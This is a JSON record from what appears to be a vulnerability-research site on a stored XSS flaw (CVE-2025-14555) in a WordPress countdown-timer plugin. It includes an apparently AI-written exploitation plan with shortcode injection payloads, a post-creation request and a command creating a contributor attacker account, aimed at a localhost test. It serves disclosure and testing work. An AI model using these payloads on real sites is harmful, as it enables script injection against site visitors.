[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXM0iDE1DkPK3djK5OLOuGFgmye5BR4jv5B__rack02s":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":33},"CVE-2025-14555","countdown-timer-widget-countdown-authenticated-contributor-stored-cross-site-scripting-via-shortcode","Countdown Timer - Widget Countdown \u003C= 2.7.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode","The Countdown Timer – Widget Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdevart_countdown' shortcode in all versions up to, and including, 2.7.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","widget-countdown",null,"\u003C=2.7.7","2.7.8","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-09 00:00:00","2026-01-10 12:23:17",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fee84c720-7997-4c09-a2f9-5e1a28bd1100?source=api-prod",2,[22,23,24,25],"includes\u002Fadmin_menu.php","includes\u002Ffront_end.php","readme.txt","wpdevart-countdown.php","researched",false,3,"This research plan focuses on exploiting a Stored Cross-Site Scripting (XSS) vulnerability in the **Countdown Timer – Widget Countdown** plugin for WordPress. The vulnerability stems from the plugin's failure to sanitize or escape shortcode attributes before rendering them within `\u003Cstyle>` or `\u003Cscript>` blocks on the frontend.\n\n### 1. Vulnerability Summary\nThe `wpdevart_countdown` shortcode handles several attributes (such as `top_ditance`, `bottom_distance`, and `font_color`) that are used to generate dynamic CSS and JavaScript. Because these attributes are concatenated directly into `\u003Cstyle>` and `\u003Cscript>` tags in `includes\u002Ffront_end.php`, a Contributor-level user can provide a payload that breaks out of the intended context (e.g., closing a CSS rule and a `\u003C\u002Fstyle>` tag) to inject arbitrary JavaScript.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[wpdevart_countdown]`\n*   **Vulnerable Attributes:** `top_ditance` (misspelled in code), `bottom_distance`, `font_color`.\n*   **Authentication Level:** Authenticated (Contributor or higher). Contributors can create posts and insert shortcodes.\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow\n1.  **Entry Point:** A user with `edit_posts` capability (Contributor+) saves a post containing the `[wpdevart_countdown]` shortcode.\n2.  **Processing:** When the post is viewed, WordPress calls the shortcode handler `wpdevart_wpdevart_countdown_shortcode` in `includes\u002Ffront_end.php`.\n3.  **Attribute Parsing:** The handler uses `shortcode_atts()` to extract attributes like `top_ditance`.\n4.  **Sinks:**\n    *   `wpdevart_wpdevart_countdown_shortcode` calls `$this->wpdevart_countdown_css($curent_value)`.\n    *   `wpdevart_countdown_css` (inferred from line 84) concatenates `top_ditance` into a string that becomes the content of a `\u003Cstyle>` block.\n    *   `wpdevart_wpdevart_countdown_shortcode` also calls `$this->wpdevart_countdown_javascript($curent_value)`.\n5.  **Output:** The unescaped values are returned in `$output_html` and rendered on the page.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is triggered by **viewing a post** containing a malicious shortcode. **No nonce is required** to execute the shortcode on the frontend. While the plugin provides an AJAX-based shortcode generator (`wpdevart_countdown_window_manager`), a Contributor can bypass this UI entirely and manually type the shortcode into the post editor.\n\n### 5. Exploitation Strategy\nThe plan is to use the `top_ditance` attribute to break out of the CSS context and inject a `\u003Cscript>` tag.\n\n*   **Payload:** `15; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003Cstyle>`\n*   **Action:** Create a post as a Contributor.\n*   **HTTP Request (Post Creation):**\n    *   **Method:** `POST`\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php` (or use `wp post create` via CLI if permitted, but the goal is to simulate the user action).\n    *   **Parameters:** `post_title=XSS Test&content=[wpdevart_countdown top_ditance=\"15; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003Cstyle>\"]&status=publish`\n\n### 6. Test Data Setup\n1.  **User Creation:** Create a user with the `contributor` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n2.  **Login:** The agent will need to authenticate as `attacker`.\n\n### 7. Expected Results\nWhen the post is viewed, the HTML source will contain:\n```html\n\u003Cstyle>\n#main_countedown_1 { margin-top: 15; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003Cstyle>px; ... }\n\u003C\u002Fstyle>\n```\nThis will cause the browser to execute `alert(document.domain)`.\n\n### 8. Verification Steps\n1.  **Manual Check:** Navigate to the published post URL using `browser_navigate`.\n2.  **DOM Inspection:** Use `browser_eval` to check if a specific \"canary\" variable exists or if the alert was triggered.\n    ```javascript\n    \u002F\u002F Check if the script was injected\n    browser_eval(\"document.body.innerHTML.includes('alert(document.domain)')\")\n    ```\n3.  **Database Check:** Verify the shortcode is stored correctly in the database.\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test'\"\n    ```\n\n### 9. Alternative Approaches\nIf `top_ditance` is sanitized (e.g., cast to `int`), try the following attributes:\n*   **`font_color`**: Often used in CSS: `font_color=\"red; } \u003C\u002Fstyle>\u003Cscript>alert(1)\u003C\u002Fscript>\u003Cstyle>\"`.\n*   **`text_for_day`**: This attribute is used in `wpdevart_wpdevart_countdown_shortcode`. Although `esc_html` is used in the HTML template (line 74), check if it is also passed to `wpdevart_countdown_javascript` and placed inside a JS variable without escaping.\n    *   **Payload:** `text_for_day=\"'; alert(1); \u002F\u002F\"`\n*   **`content`**: If the countdown expires and the action is not `hide`, the shortcode content might be rendered.\n    *   **Payload:** `[wpdevart_countdown end_time=\"0,0,0\" action_end_time=\"show\"]\u003Cscript>alert(1)\u003C\u002Fscript>[\u002Fwpdevart_countdown]` (Note: `0,0,0` ensures the timer is expired).","gemini-3-flash-preview","2026-05-05 12:35:41","2026-05-05 12:36:20",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.7.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwidget-countdown\u002Ftags\u002F2.7.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-countdown.2.7.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwidget-countdown\u002Ftags\u002F2.7.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwidget-countdown.2.7.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwidget-countdown\u002Ftags"]